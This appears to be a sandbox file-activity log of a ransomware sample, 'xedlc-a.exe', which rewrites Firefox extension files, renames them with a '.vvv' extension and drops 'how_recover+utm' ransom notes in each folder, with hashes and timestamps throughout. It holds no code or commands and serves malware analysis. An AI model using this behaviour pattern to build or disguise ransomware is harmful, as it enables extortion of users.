- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778360
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84592
- mode: close
- sequenceNumber: 1364
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778360
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84602
- mode: created
- sequenceNumber: 1365
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-data\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778361
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84610
- mode: close
- sequenceNumber: 1366
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-data\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778361
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84619
- mode: created
- sequenceNumber: 1367
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-data\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778362
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84628
- mode: close
- sequenceNumber: 1368
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-data\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778362
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84638
- mode: open
- sequenceNumber: 1369
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js
- filesize: 2014
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476257
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84699
- mode: close
- sequenceNumber: 1370
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js
- filesize: 2430
- md5sum: e84ea4127a4bc5d39013e9709c9516de
- sha1sum: 274cc265eb7e2400f251014fde50e6bc32e52501
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476257
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84711
- mode: rename
- sequenceNumber: 1371
- filesize: 2430
- md5sum: e84ea4127a4bc5d39013e9709c9516de
- sha1sum: 274cc265eb7e2400f251014fde50e6bc32e52501
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js.vvv
- ads:
- fid (ads:): 562949953476257
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84723
- mode: created
- sequenceNumber: 1372
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778363
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84732
- mode: close
- sequenceNumber: 1373
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778363
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84777
- mode: created
- sequenceNumber: 1374
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778364
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84786
- mode: close
- sequenceNumber: 1375
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778364
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84796
- mode: open
- sequenceNumber: 1376
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-main.js
- filesize: 764
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476250
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84805
- mode: close
- sequenceNumber: 1377
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-main.js
- filesize: 1182
- md5sum: 291a6dd66b52bbf3b502b07d389d676b
- sha1sum: 540705c148f61c0d1da9153bcdf9eb6c135b0fc6
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476250
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84817
- mode: rename
- sequenceNumber: 1378
- filesize: 1182
- md5sum: 291a6dd66b52bbf3b502b07d389d676b
- sha1sum: 540705c148f61c0d1da9153bcdf9eb6c135b0fc6
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-main.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-main.js.vvv
- ads:
- fid (ads:): 562949953476250
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84829
- mode: created
- sequenceNumber: 1379
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778365
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84837
- mode: close
- sequenceNumber: 1380
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778365
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84858
- mode: created
- sequenceNumber: 1381
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778366
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84867
- mode: close
- sequenceNumber: 1382
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778366
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84876
- mode: created
- sequenceNumber: 1383
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778367
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84883
- mode: close
- sequenceNumber: 1384
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778367
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84891
- mode: created
- sequenceNumber: 1385
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778368
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84898
- mode: close
- sequenceNumber: 1386
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778368
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84907
- mode: created
- sequenceNumber: 1387
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778369
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84913
- mode: close
- sequenceNumber: 1388
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778369
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84921
- mode: created
- sequenceNumber: 1389
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778370
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84928
- mode: close
- sequenceNumber: 1390
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778370
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84937
- mode: open
- sequenceNumber: 1391
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
- filesize: 605
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476215
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84959
- mode: close
- sequenceNumber: 1392
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
- filesize: 1022
- md5sum: b913116640df8332574795d0adee78de
- sha1sum: 1e3f576b357cd12888687d6bdcb4b1a783fad34c
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476215
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84970
- mode: rename
- sequenceNumber: 1393
- filesize: 1022
- md5sum: b913116640df8332574795d0adee78de
- sha1sum: 1e3f576b357cd12888687d6bdcb4b1a783fad34c
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js.vvv
- ads:
- fid (ads:): 562949953476215
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84981
- mode: open
- sequenceNumber: 1394
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
- filesize: 3770
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476218
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85157
- mode: close
- sequenceNumber: 1395
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
- filesize: 4190
- md5sum: af25b55db4ab05d800593cfb02532a01
- sha1sum: 1b060c0d8c71d218508d6841cf3a03010917387b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476218
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85230
- mode: rename
- sequenceNumber: 1396
- filesize: 4190
- md5sum: af25b55db4ab05d800593cfb02532a01
- sha1sum: 1b060c0d8c71d218508d6841cf3a03010917387b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js.vvv
- ads:
- fid (ads:): 562949953476218
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85249
- mode: created
- sequenceNumber: 1397
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778371
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85262
- mode: close
- sequenceNumber: 1398
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778371
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85276
- mode: created
- sequenceNumber: 1399
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778372
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85288
- mode: close
- sequenceNumber: 1400
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778372
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85296
- mode: open
- sequenceNumber: 1401
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
- filesize: 1442
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476217
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85339
- mode: close
- sequenceNumber: 1402
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
- filesize: 1870
- md5sum: a00d345060f1beda4324fc4dbb3228fc
- sha1sum: f486f297a818b14e964e52adaa801d6c37125a2b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476217
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85363
- mode: rename
- sequenceNumber: 1403
- filesize: 1870
- md5sum: a00d345060f1beda4324fc4dbb3228fc
- sha1sum: f486f297a818b14e964e52adaa801d6c37125a2b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt.vvv
- ads:
- fid (ads:): 562949953476217
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85374
- mode: created
- sequenceNumber: 1404
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778373
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85382
- mode: close
- sequenceNumber: 1405
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778373
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85393
- mode: created
- sequenceNumber: 1406
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778374
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85401
- mode: close
- sequenceNumber: 1407
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778374
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85410
- mode: created
- sequenceNumber: 1408
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778375
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85416
- mode: close
- sequenceNumber: 1409
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778375
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85424
- mode: created
- sequenceNumber: 1410
